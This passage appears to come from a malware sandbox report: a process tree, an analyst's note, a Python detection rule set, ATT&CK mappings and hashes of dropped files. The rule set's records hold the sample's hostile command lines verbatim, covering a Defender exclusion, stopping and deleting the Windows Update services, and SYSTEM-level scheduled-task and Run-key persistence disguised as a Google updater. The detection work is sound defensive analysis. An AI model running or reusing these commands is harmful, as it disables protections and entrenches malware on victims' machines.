    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 4340
  [level 2] C:\Windows\System32\dialer.exe  PID: 3304
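The level-2 entries under Explorer.EXE (PIDs 4644, 3172, 1732, 4340 and 3304) sit there because the tree is built from the recorded parent PID; LicSend.exe (PID 920) is the process tagged with NtCreateUserProcessOtherParentProcess, which is consistent with Explorer being a supplied parent rather than the real one. A detection keyed on "shell spawned by a dropped binary" therefore never fires here, and the command lines themselves are the better signal. The Python rule set below is an added analyst aid, not sandbox output and not code from the sample: the records are constructed from the command lines above (the Explorer parent fields are what the tree records; the services.exe parent on the svchost control record is an assumption), and the rules look for the Defender exclusion, the stop-and-delete of the five Windows Update services, the zeroed power timeouts, the once-with-one-minute-repeat task that LicCheck.exe registers, and the SYSTEM-level startup task the last PowerShell command creates when it runs elevated. Two caveats a practitioner should keep in mind: the bare dialer.exe (PID 3304) carries no command-line signal at all and has to be hunted through injection telemetry instead, and the WaaSMedicAgent.exe entry later in the tree, tagged as setting a service image path, together with wuauserv running again afterwards (PID 2168), is consistent with Windows Update Medic re-creating the deleted registration, so a check of the final registry state alone would miss the deletion.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record: the fields a Sysmon event 1 or EDR telemetry carries."""
    pid: int
    parent_image: str
    image: str
    cmdline: str


# Records constructed from the command lines in the tree above. The Explorer.EXE parents are
# what the tree records for the level-2 entries; the services.exe parent on the svchost
# control record is an assumption, not something the report shows.
EVENTS = [
    ProcEvent(4644, r"C:\Windows\Explorer.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference "
              r"-ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"),
    ProcEvent(3172, r"C:\Windows\Explorer.EXE", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv "
              r'& sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f '
              r'& reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f'),
    ProcEvent(1732, r"C:\Windows\Explorer.EXE", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -standby-timeout-ac 0"),
    ProcEvent(4568, r"C:\Users\Admin\AppData\Local\Temp\LicCheck.exe", r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" '
              r'/tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f'),
    ProcEvent(4340, r"C:\Windows\Explorer.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> "
              r"IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()))"
              r".IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) "
              r'{ IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") '
              r"{ schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' "
              r"/tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask "
              r"-Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') "
              r"-Trigger (New-ScheduledTaskTrigger -AtStartup) -TaskName 'GoogleUpdateTaskMachineQC' "
              r"-User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "
              r'"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f '
              r"/d 'C:\Program Files\Google\Chrome\updater.exe' }"),
    ProcEvent(1192, r"C:\Windows\System32\services.exe", r"C:\Windows\system32\svchost.exe",
              r"C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc"),
]

UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}


def defender_exclusion_added(e: ProcEvent) -> bool:
    c = e.cmdline.lower()
    return "add-mppreference" in c and "-exclusion" in c


def update_services_disabled(e: ProcEvent) -> bool:
    stopped = re.findall(r"\bsc(?:\.exe)?\s+stop\s+(\w+)", e.cmdline, re.I)
    deleted = re.findall(r'reg(?:\.exe)?\s+delete\s+"?HKLM\\SYSTEM\\CurrentControlSet\\Services\\(\w+)',
                         e.cmdline, re.I)
    touched = {n.lower() for n in stopped + deleted} & UPDATE_SERVICES
    return len(touched) >= 2  # one service is routine admin work; several at once is tampering


def power_timeouts_zeroed(e: ProcEvent) -> bool:
    pattern = r"powercfg(?:\.exe)?\s+/x\s+-(?:hibernate|standby)-timeout-(?:ac|dc)\s+0\b"
    return re.search(pattern, e.cmdline, re.I) is not None


def minute_repeat_task(e: ProcEvent) -> bool:
    # /sc once plus /ri N plus a long /du is a task that re-fires every N minutes indefinitely
    c = e.cmdline.lower()
    return "schtasks" in c and "/create" in c and "/sc once" in c and re.search(r"/ri\s+\d+", c) is not None


def system_task_from_script(e: ProcEvent) -> bool:
    c = e.cmdline.lower()
    legacy = "schtasks" in c and "/create" in c and re.search(r"/ru\s+'?system'?", c) is not None
    modern = "register-scheduledtask" in c and re.search(r"-user\s+'?system'?", c) is not None
    return legacy or modern


RULES = {
    "defender_exclusion_added": (defender_exclusion_added, "T1562.001"),
    "update_services_disabled": (update_services_disabled, "T1489"),
    "power_timeouts_zeroed": (power_timeouts_zeroed, "T1653"),
    "minute_repeat_task": (minute_repeat_task, "T1053.005"),
    "system_task_from_script": (system_task_from_script, "T1053.005"),
}


def evaluate(events) -> dict:
    """Map each rule that fires to the PIDs it fired on, in event order."""
    hits = {}
    for e in events:
        for name, (pred, _) in RULES.items():
            if pred(e):
                hits.setdefault(name, []).append(e.pid)
    return hits


def techniques(hits: dict) -> set:
    """ATT&CK technique IDs for the rules that fired."""
    return {RULES[name][1] for name in hits}


if __name__ == "__main__":
    found = evaluate(EVENTS)
    for name, pids in found.items():
        print(f"{name:26} {RULES[name][1]:10} PIDs {pids}")
    print("techniques:", sorted(techniques(found)))
```

The update-service rule needs two of the five services in one command line before it fires, so a lone `sc stop bits` from an administrator does not page anyone; the stop-and-delete of all five together, as above, is what characterises the tampering.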
[level 1] C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc  PID: 3708
[level 1] C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}  PID: 3900
[level 1] C:\Windows\System32\RuntimeBroker.exe -Embedding  PID: 4056
[level 1] C:\Windows\System32\RuntimeBroker.exe -Embedding  PID: 4144
[level 1] C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc  PID: 2104
[level 1] C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV  PID: 3568
[level 1] C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc  PID: 1780
[level 1] C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  - Modifies data under HKEY_USERS
  PID: 4452
[level 1] "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID: 5088
[level 1] C:\Windows\system32\SppExtComObj.exe -Embedding  PID: 4612
[level 1] C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager  PID: 1892
[level 1] C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}  PID: 4564
[level 1] C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc  PID: 2996
[level 1] C:\Windows\System32\RuntimeBroker.exe -Embedding  PID: 3624
[level 1] C:\Windows\System32\WaaSMedicAgent.exe a32deedf406e03daa0217b35b68f15d6 sdJVErYO2UGYljhTfQOAWw.0.1.0.0.0
  - Sets service image path in registry
  PID: 2388
  [level 2] \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1  (image: C:\Windows\System32\Conhost.exe)  PID: 2400
[level 1] C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
  - Drops file in Windows directory
  PID: 2168
[level 1] C:\Windows\servicing\TrustedInstaller.exe  PID: 4256
[level 1] C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding  PID: 2472
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
- System Services (1): Service Execution (1)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2): Windows Service (2)
- Power Settings (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2): Windows Service (2)
- Scheduled Task/Job (1): Scheduled Task (1)
Defense Evasion
- Impair Defenses (1)
- Indicator Removal (1): Clear Windows Event Logs (1)
- Modify Registry (2)
- Obfuscated Files or Information (1): Command Obfuscation (1)
Downloads
File 1 (name not captured)
  Filesize: 3KB
  MD5:    223bd4ae02766ddc32e6145fd1a29301
  SHA1:   900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
  SHA256: 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
  SHA512: 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc
File 2 (name not captured)
  Filesize: 1KB
  MD5:    e1d7973fb9071815b4241da5ec0dfb6a
  SHA1:   41f06afbd0ac9f9a0b226a2dd6fa9495d83209b9
  SHA256: b3953ac9f5752d996ec2545864d6ccf09ffe4b0f84f41a2cc52a95ad8103212b
  SHA512: 66163114aba8867561ceac2124bc2060c351cb4a83c4f8d40bc6bfd8042881690ea8152e2b58ec55b4b6de17e1610642c90df602e1fb2658b4c3d0783f3a0900
File 3 (name not captured)
  Filesize: 944B
  MD5:    a66904fe28a9c28446e44f44e5ba034b
  SHA1:   d4277226b3b95b2f92dc745bda7096a98d4a9f26
  SHA256: eb82b392f4cc90f4bb62e8d5d779a23ee0aa67832dcc8af94ce6099dd6cef8a7
  SHA512: a873699317c8905a3171985b04f9aa15993224bf18dad3233254229e04deec7232eb9effa1f6f17a9ad525d33a65cc7bb0000d899c2ebcc8ab312be6d01081a1
File 4 (name not captured)
  Filesize: 287KB
  MD5:    726a5b76f4c40551741ffdda14088ce3
  SHA1:   df94d2f5475e8550b8d8f5de6937f896bf0ea6b8
  SHA256: 69487840add22f155734e6e522e5e1437814caccc14e137e0a9a602b790a4cb9
  SHA512: 477ce8e7b4dfdf288bce73bf3f30ce8a94c53617903eb5b5b9b4bb61795e56ed4cd908100f88fab76ff67fb7df6c94280be50576e672fcac27589117e1c7ce06
File 5 (name not captured)
  Filesize: 2.2MB
  MD5:    4648d5ef582c7b17d9712f5b5b60f046
  SHA1:   249bac0094f6aec1c4bb36f704ddca1c708401a7
  SHA256: 0dbed06724205e7995f45b769454c3ebfd832f633471729eebce756cb90fc348
  SHA512: 04839048b38a1bcff4254c77f479475c0b2e30e2d2be5fae65f23274107064a3d0abb3ca8d1693a1809db4db9dfbe7a2681c169ebe536fefb0cb01330d118f6f
File 6 (name not captured)
  Filesize: 204KB
  MD5:    e9b8360ea19d6c4f82f9fdb3adb8b566
  SHA1:   d488e41552b2395c92be89473c9bdcde41795d18
  SHA256: 31c9833faf987402ff5144a5690938f4e2bf6a8fcaf22b2df271c7e43d9f3e07
  SHA512: 699934c81503f512a50f1ad3dd9ada48a38cc8f5a608b9bada9cea5d0f0d1e5340b59eb41fec528ad90d92351dd922daeabb459baea2da89ae2bf45963ce4f4d
File 7 (name not captured)
  Filesize: 60B
  MD5:    d17fe0a3f47be24a6453e9ef58c94641
  SHA1:   6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
File 8 (name not captured)
  Filesize: 4KB
  MD5:    26fcacd27377df115ef919213279e2a9
  SHA1:   4eb3e59e6bb7c2ea1e779bae96b88bce66643c76
  SHA256: f85baf14da37326dcdf2a1553216a1d8325cb7a6b7c73478b6bf1a443823f28f
  SHA512: 32578825f25bdddef862d492a1d01e2a5b692dc22639cf4d1538121d28407e50ae86f7a99a20857dc6032f9ba0f8dc095b479610f610262bedeee63b88785739